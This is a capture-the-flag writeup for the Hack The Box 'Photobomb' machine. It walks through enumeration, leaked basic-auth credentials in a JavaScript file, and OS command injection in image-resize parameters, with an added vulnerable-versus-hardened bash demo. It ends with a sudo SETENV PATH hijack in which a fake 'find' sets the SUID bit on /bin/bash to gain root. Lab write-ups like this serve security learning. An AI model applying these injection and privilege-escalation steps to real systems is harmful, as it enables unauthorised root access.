HTB - Writeups

šŸ§ Photobomb

Sat Feb 11, 2023

This is my writeup for the Photobomb machine on the Hack The Box platform.

Let's start with an nmap scan to enumerate the open ports. Only two ports are open:

  • Port 22 (SSH)
  • Port 80 (HTTP)
> nmap -sC -sV 10.10.11.182

Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-30 16:25 CET
Nmap scan report for 10.10.11.182
Host is up (0.095s latency).
Not shown: 799 closed ports, 199 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds

Website

When we browse to the IP address, we are redirected to the domain photobomb.htb, so we add it to our /etc/hosts file.

> curl -v http://10.10.11.182

*   Trying 10.10.11.182:80...
* Connected to 10.10.11.182 (10.10.11.182) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.11.182
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 30 Jan 2023 15:26:28 GMT
< Content-Type: text/html
< Content-Length: 154
< Connection: keep-alive
< Location: http://photobomb.htb/

The main webpage doesn't have any special functionality and contains only a link.

Main Website

The Click Here button redirects to /printer, which asks for HTTP basic authentication.

Basic

If we look at the JavaScript file photobomb.js loaded by the page, we find hard-coded credentials for /printer.

  • pH0t0:b0Mb!

Javascript

The printer page lets a user download an image resized to a chosen dimension. We pick the smallest size (30x20) so we don't wait long for the resize on each request.

Printer

The Burp Suite scanner reports OS command injection in the following parameters:

  • filetype
  • dimensions

Burp

To rule out a false positive, we inject `sleep 10` into the parameter and check that the response now arrives about 10 seconds later than a normal request. A time-based check like this is the safest confirmation, since the command output is never returned in the response.

Sleep

With the injection confirmed, we use the same parameter to launch a reverse shell and get a first foothold on the server as the wizard user.

Curl Shell
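The writeup does not show the server-side code, so here is an added illustration (mine, not the Photobomb application's) of the pattern behind this bug: a handler that splices the filetype and dimensions parameters into a command string which a shell then re-parses, next to the same handler calling the tool with separate arguments and an allowlist. The `convert ... -resize WxH` invocation and the photo argument are assumptions; `convert` itself is a stub written to a temp directory so the script runs anywhere, and `echo INJECTED` stands in for the `sleep 10` used against the box.

```bash
#!/usr/bin/env bash
# Added example, not the target's code: how a resize parameter becomes an
# OS command injection, and what the hardened handler looks like.
set -u

# Stub "convert" (assumed ImageMagick-style tool) so the demo runs without
# ImageMagick. It only reports the argv it received.
WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
cat > "$WORK/convert" <<'EOF'
#!/bin/sh
printf 'convert called with %d args:' "$#"
for a in "$@"; do printf ' [%s]' "$a"; done
printf '\n'
EOF
chmod +x "$WORK/convert"
PATH="$WORK:$PATH"

# VULNERABLE (assumed app pattern): user input is interpolated into a command
# string that a shell re-parses, so ';' in dimensions starts a second command.
resize_vulnerable() {
    local photo="$1" filetype="$2" dimensions="$3"
    sh -c "convert $photo -resize $dimensions out.$filetype"
}

# BETTER: pass each value as its own argv element. No shell parses the input,
# so "30x20;echo INJECTED #" reaches convert as one literal argument.
resize_argv_only() {
    local photo="$1" filetype="$2" dimensions="$3"
    convert "$photo" -resize "$dimensions" "out.$filetype"
}

# HARDENED: argv passing plus strict allowlists, so even a value the tool
# itself might interpret (e.g. a filename starting with '-') never arrives.
valid_dimensions() { printf '%s' "$1" | grep -Eq '^[0-9]{1,5}x[0-9]{1,5}$'; }
valid_filetype()   { case "$1" in jpg|png) return 0 ;; *) return 1 ;; esac; }

resize_hardened() {
    local photo="$1" filetype="$2" dimensions="$3"
    valid_filetype "$filetype"     || { echo "rejected filetype: $filetype" >&2; return 2; }
    valid_dimensions "$dimensions" || { echo "rejected dimensions: $dimensions" >&2; return 2; }
    convert "$photo" -resize "$dimensions" "out.$filetype"
}

# Payload in the shape used against the box. The trailing '#' comments out
# whatever the app appends after our value.
PAYLOAD='30x20;echo INJECTED #'

echo "--- vulnerable:";  resize_vulnerable photo.jpg jpg "$PAYLOAD"
echo "--- argv only:";   resize_argv_only  photo.jpg jpg "$PAYLOAD"
echo "--- hardened:";    resize_hardened   photo.jpg jpg "$PAYLOAD" || echo "(blocked, rc=$?)"
echo "--- hardened, legitimate request:"; resize_hardened photo.jpg jpg 30x20
```

In the vulnerable run `convert` only ever sees `30x20` and the second command executes; in the argv-only run the whole payload arrives as a single, harmless argument; the hardened run rejects it before any process is spawned.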


Privesc

Listing the sudo privileges of the wizard user shows something interesting: wizard may run the script /opt/cleanup.sh as root without a password, and the SETENV tag allows environment variables to be set on the sudo command line for it. That tag matters: without it, env_reset and secure_path would force the PATH shown below and a user-supplied PATH would be refused.

wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

The script is readable and executable for all users, so we can read it to find a vulnerability.

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Two commands in the script are called without an absolute path:

  • cd (a bash builtin: the shell resolves it itself, never through PATH, so it cannot be hijacked)
  • find (an external binary, resolved through PATH)

Because sudo grants SETENV, we control the PATH the script runs with, so we can perform a PATH hijacking attack on find: drop an executable named find in a directory we own, make it executable (chmod +x), prepend that directory to PATH, and the script runs our find as root instead of /usr/bin/find: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-command-suid-binary-without-command-path

wizard@photobomb:/tmp$ cat /tmp/find
#!/bin/bash

chmod u+s /bin/bash
wizard@photobomb:/tmp$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
wizard@photobomb:/tmp$ bash -p

bash-5.0# id
uid=1000(wizard) gid=1000(wizard) euid=0(root) groups=1000(wizard)